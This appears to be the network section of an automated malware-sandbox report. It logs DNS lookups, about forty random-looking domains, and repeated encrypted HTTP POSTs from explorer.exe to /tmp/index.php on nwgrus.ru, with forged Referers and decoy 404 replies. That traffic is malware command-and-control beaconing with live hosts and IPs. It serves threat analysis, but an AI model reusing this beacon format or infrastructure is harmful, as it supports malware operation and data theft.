                                                                                                                                            Oct 4, 2024 19:20:12.838850975 CEST1.1.1.1192.168.2.40xa7No error (0)nwgrus.ru201.212.52.197A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:20:12.838850975 CEST1.1.1.1192.168.2.40xa7No error (0)nwgrus.ru189.143.207.58A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:20:12.838850975 CEST1.1.1.1192.168.2.40xa7No error (0)nwgrus.ru177.129.90.106A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:20:12.838850975 CEST1.1.1.1192.168.2.40xa7No error (0)nwgrus.ru187.204.9.111A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:20:12.838850975 CEST1.1.1.1192.168.2.40xa7No error (0)nwgrus.ru187.131.253.169A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:20:12.838850975 CEST1.1.1.1192.168.2.40xa7No error (0)nwgrus.ru62.150.232.50A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:20:12.838876009 CEST1.1.1.1192.168.2.40xa7No error (0)nwgrus.ru180.75.11.133A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:20:12.838876009 CEST1.1.1.1192.168.2.40xa7No error (0)nwgrus.ru93.118.137.82A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:20:12.838876009 CEST1.1.1.1192.168.2.40xa7No error (0)nwgrus.ru186.233.231.45A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:20:12.838876009 CEST1.1.1.1192.168.2.40xa7No error (0)nwgrus.ru190.13.174.94A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:20:12.838876009 CEST1.1.1.1192.168.2.40xa7No error (0)nwgrus.ru201.212.52.197A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:20:12.838876009 CEST1.1.1.1192.168.2.40xa7No error (0)nwgrus.ru189.143.207.58A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:20:12.838876009 CEST1.1.1.1192.168.2.40xa7No error (0)nwgrus.ru177.129.90.106A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:20:12.838876009 CEST1.1.1.1192.168.2.40xa7No error (0)nwgrus.ru187.204.9.111A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:20:12.838876009 CEST1.1.1.1192.168.2.40xa7No error (0)nwgrus.ru187.131.253.169A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:20:12.838876009 CEST1.1.1.1192.168.2.40xa7No error (0)nwgrus.ru62.150.232.50A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:20:12.838891029 CEST1.1.1.1192.168.2.40xa7No error (0)nwgrus.ru180.75.11.133A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:20:12.838891029 CEST1.1.1.1192.168.2.40xa7No error (0)nwgrus.ru93.118.137.82A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:20:12.838891029 CEST1.1.1.1192.168.2.40xa7No error (0)nwgrus.ru186.233.231.45A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:20:12.838891029 CEST1.1.1.1192.168.2.40xa7No error (0)nwgrus.ru190.13.174.94A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:20:12.838891029 CEST1.1.1.1192.168.2.40xa7No error (0)nwgrus.ru201.212.52.197A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:20:12.838891029 CEST1.1.1.1192.168.2.40xa7No error (0)nwgrus.ru189.143.207.58A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:20:12.838891029 CEST1.1.1.1192.168.2.40xa7No error (0)nwgrus.ru177.129.90.106A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:20:12.838891029 CEST1.1.1.1192.168.2.40xa7No error (0)nwgrus.ru187.204.9.111A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:20:12.838891029 CEST1.1.1.1192.168.2.40xa7No error (0)nwgrus.ru187.131.253.169A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:20:12.838891029 CEST1.1.1.1192.168.2.40xa7No error (0)nwgrus.ru62.150.232.50A (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:20:12.967906952 CEST1.1.1.1192.168.2.40x4840Name error (3)bestworldhools.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:20:25.121330023 CEST1.1.1.1192.168.2.40xbc93Name error (3)calvinandhalls.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:20:26.754235983 CEST1.1.1.1192.168.2.40xe458Name error (3)bestworldhools.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:20:26.757999897 CEST1.1.1.1192.168.2.40xe458Name error (3)bestworldhools.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:20:39.974594116 CEST1.1.1.1192.168.2.40xf42bName error (3)calvinandhalls.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:20:40.950891972 CEST1.1.1.1192.168.2.40xae14Name error (3)bestworldhools.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:20:55.620475054 CEST1.1.1.1192.168.2.40xc023Name error (3)calvinandhalls.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:20:55.620501041 CEST1.1.1.1192.168.2.40xc023Name error (3)calvinandhalls.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:20:56.917818069 CEST1.1.1.1192.168.2.40xf725Name error (3)bestworldhools.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                            Oct 4, 2024 19:20:56.917860031 CEST1.1.1.1192.168.2.40xf725Name error (3)bestworldhools.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                            • 23.145.40.164
                                                                                                                                            • codeberg.org
                                                                                                                                            • ymfsjxxjefdfso.com
                                                                                                                                              • nwgrus.ru
                                                                                                                                            • gaaiqehpdrl.com
                                                                                                                                            • nsyybqctivusmhf.net
                                                                                                                                            • gyhesrqsslpwya.com
                                                                                                                                            • adcijuuyqpoytbg.com
                                                                                                                                            • ynyhgoxksqcqux.org
                                                                                                                                            • efqngojwjwmo.net
                                                                                                                                            • slcfgcsbfxfboq.com
                                                                                                                                            • soxhctcejph.net
                                                                                                                                            • unecmrmecypjdcds.net
                                                                                                                                            • rsqwlptdbkicnj.net
                                                                                                                                            • qfsgibodkcmgjnhs.net
                                                                                                                                            • iypyxugbhpjfu.org
                                                                                                                                            • wckgnkwavbhg.org
                                                                                                                                            • bsjhlaqplgxee.net
                                                                                                                                            • msepyhqdoiyw.com
                                                                                                                                            • ubqbmapskssunnlw.com
                                                                                                                                            • qfqulohrbnuwl.org
                                                                                                                                            • ishmldllgtoat.com
                                                                                                                                            • pgccgnhrnlclx.org
                                                                                                                                            • aavvgkbncxkwcma.org
                                                                                                                                            • ldwiwwwcudjue.net
                                                                                                                                            • msydcfqytkyly.org
                                                                                                                                            • ynkhngybxmld.net
                                                                                                                                            • iwomylugxujp.org
                                                                                                                                            • vqlmgxiqipmlfda.org
                                                                                                                                            • mhabccdcfgoeshi.com
                                                                                                                                            • qhqjabyurfswwyf.org
                                                                                                                                            • jfivjaggias.net
                                                                                                                                            • oecmcnbulbfndgqw.com
                                                                                                                                            • tpydbdrotfs.net
                                                                                                                                            • qrkdkbqfwfclqg.org
                                                                                                                                            • owadrehnugjdh.org
                                                                                                                                            • wyvokdhlnlrsvuh.net
                                                                                                                                            • daglechfqxgadh.net
                                                                                                                                            • lshvsjxacvhbre.com
                                                                                                                                            • nweaheqhdcfapi.net
                                                                                                                                            • jwpopyrbbpjc.com
                                                                                                                                            • syllqtgnchytfjbx.org
                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            0192.168.2.449736177.129.90.106802580C:\Windows\explorer.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 4, 2024 19:17:29.901056051 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Accept: */*
                                                                                                                                            Referer: http://ymfsjxxjefdfso.com/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                            Content-Length: 235
                                                                                                                                            Host: nwgrus.ru
                                                                                                                                            Oct 4, 2024 19:17:29.901079893 CEST235OUTData Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 73 2d e0 a0
                                                                                                                                            Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA .[k,vus-UeiP*qDAnj>v&qY:7d>*(zyB91'}%\;#E5x663Nrcyb\RN
                                                                                                                                            Oct 4, 2024 19:17:31.162223101 CEST152INHTTP/1.1 404 Not Found
                                                                                                                                            Server: nginx/1.26.0
                                                                                                                                            Date: Fri, 04 Oct 2024 17:17:30 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Connection: close
                                                                                                                                            Data Raw: 04 00 00 00 72 e8 86 e4
                                                                                                                                            Data Ascii: r


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            1192.168.2.449737177.129.90.106802580C:\Windows\explorer.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 4, 2024 19:17:31.219259024 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Accept: */*
                                                                                                                                            Referer: http://gaaiqehpdrl.com/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                            Content-Length: 197
                                                                                                                                            Host: nwgrus.ru
                                                                                                                                            Oct 4, 2024 19:17:31.219259024 CEST197OUTData Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 7e 01 fd 93
                                                                                                                                            Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA -[k,vu~_Nj|Nc?1feUs\ujq0IERhWRIsBa)~u9l
                                                                                                                                            Oct 4, 2024 19:17:32.743103981 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                            Server: nginx/1.26.0
                                                                                                                                            Date: Fri, 04 Oct 2024 17:17:32 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Connection: close
                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            2192.168.2.449738177.129.90.106802580C:\Windows\explorer.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 4, 2024 19:17:32.751941919 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Accept: */*
                                                                                                                                            Referer: http://nsyybqctivusmhf.net/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                            Content-Length: 275
                                                                                                                                            Host: nwgrus.ru
                                                                                                                                            Oct 4, 2024 19:17:32.751979113 CEST275OUTData Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 7f 23 bf 9e
                                                                                                                                            Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA -[k,vu#UeEL~WJ(Qq67bBrSS9Y"~TXovJ&_:{ghq69c4gV]tANkgkoTe
                                                                                                                                            Oct 4, 2024 19:17:34.012309074 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                            Server: nginx/1.26.0
                                                                                                                                            Date: Fri, 04 Oct 2024 17:17:33 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Connection: close
                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            3192.168.2.449739177.129.90.106802580C:\Windows\explorer.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 4, 2024 19:17:34.024044991 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Accept: */*
                                                                                                                                            Referer: http://gyhesrqsslpwya.com/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                            Content-Length: 218
                                                                                                                                            Host: nwgrus.ru
                                                                                                                                            Oct 4, 2024 19:17:34.024066925 CEST218OUTData Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 4f 35 be 81
                                                                                                                                            Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA -[k,vuO5K^xvhkwS4rwTZ}c'F(R;0t(:puyGFxA=VeEd]9;),U
                                                                                                                                            Oct 4, 2024 19:17:35.661429882 CEST137INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx/1.26.0
                                                                                                                                            Date: Fri, 04 Oct 2024 17:17:35 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Connection: close


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            4192.168.2.449740177.129.90.106802580C:\Windows\explorer.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 4, 2024 19:17:35.671066046 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Accept: */*
                                                                                                                                            Referer: http://adcijuuyqpoytbg.com/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                            Content-Length: 131
                                                                                                                                            Host: nwgrus.ru
                                                                                                                                            Oct 4, 2024 19:17:35.671091080 CEST131OUTData Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 42 5f a1 f8
                                                                                                                                            Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA -[k,vuB_tW~ ~D>W7.rq4iyd
                                                                                                                                            Oct 4, 2024 19:17:37.176362038 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                            Server: nginx/1.26.0
                                                                                                                                            Date: Fri, 04 Oct 2024 17:17:36 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Connection: close
                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            5192.168.2.449741177.129.90.106802580C:\Windows\explorer.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 4, 2024 19:17:37.185187101 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Accept: */*
                                                                                                                                            Referer: http://ynyhgoxksqcqux.org/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                            Content-Length: 294
                                                                                                                                            Host: nwgrus.ru
                                                                                                                                            Oct 4, 2024 19:17:37.185203075 CEST294OUTData Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 48 1f ae b9
                                                                                                                                            Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA -[k,vuH3OscSEC(.EWig*J0%v(3?aU?[a1\=deI9[q{A/8&y:T*kWj<o
                                                                                                                                            Oct 4, 2024 19:17:38.460279942 CEST137INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx/1.26.0
                                                                                                                                            Date: Fri, 04 Oct 2024 17:17:38 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Connection: close


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            6192.168.2.449742177.129.90.106802580C:\Windows\explorer.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 4, 2024 19:17:38.468645096 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Accept: */*
                                                                                                                                            Referer: http://efqngojwjwmo.net/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                            Content-Length: 365
                                                                                                                                            Host: nwgrus.ru
                                                                                                                                            Oct 4, 2024 19:17:38.468666077 CEST365OUTData Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 7e 24 cf f0
                                                                                                                                            Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA -[k,vu~$qu"Pbj0wfdUJ/7}\-p_Y'h<f4%+>stF2M&7keF}VNA^8kJ,.L9
                                                                                                                                            Oct 4, 2024 19:17:39.742799044 CEST137INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx/1.26.0
                                                                                                                                            Date: Fri, 04 Oct 2024 17:17:39 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Connection: close


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            7192.168.2.449743177.129.90.106802580C:\Windows\explorer.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 4, 2024 19:17:39.751497030 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Accept: */*
                                                                                                                                            Referer: http://slcfgcsbfxfboq.com/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                            Content-Length: 313
                                                                                                                                            Host: nwgrus.ru
                                                                                                                                            Oct 4, 2024 19:17:39.751589060 CEST313OUTData Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 25 44 c2 ee
                                                                                                                                            Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA -[k,vu%D|TktW&v3FqS-y*EJE_EhQ;Bhj~NN)p`.; D0'wws$VuXq$Sz
                                                                                                                                            Oct 4, 2024 19:17:41.935817957 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                            Server: nginx/1.26.0
                                                                                                                                            Date: Fri, 04 Oct 2024 17:17:40 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Connection: close
                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                                                                                                                                            Oct 4, 2024 19:17:41.936752081 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                            Server: nginx/1.26.0
                                                                                                                                            Date: Fri, 04 Oct 2024 17:17:40 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Connection: close
